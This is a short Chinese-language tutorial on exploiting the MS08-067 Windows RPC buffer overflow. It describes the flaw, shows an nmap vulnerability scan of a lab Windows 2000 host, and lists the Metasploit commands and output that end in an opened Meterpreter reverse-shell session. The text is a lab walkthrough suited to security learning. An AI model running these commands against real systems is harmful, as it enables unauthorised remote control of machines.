使用metasploit测试MS08-067漏洞

1)MS08-067描述
MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本,甚至还包括测试阶段的Windows 7 Pre-Beta。
2)漏洞利用
测试环境:Windows 2000
先使用nmap扫描一下:
C:\Users\dell>nmap -sS -A –script=smb-check-vulns –script-args=unsafe=1 -P0 172.16.100.166
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
可以看到提示MS08-067: VULNERABLE
然后使用metasploit
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.100.166
rhost => 172.16.100.166
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.100.128:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows 2000 – – lang:Chinese – Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability…
[*] Sending stage (885806 bytes) to 172.16.100.166
[*] Meterpreter session 2 opened (172.16.100.128:4444 -> 172.16.100.166:1030) at 2016-06-29 09:46:54 +0800

meterpreter >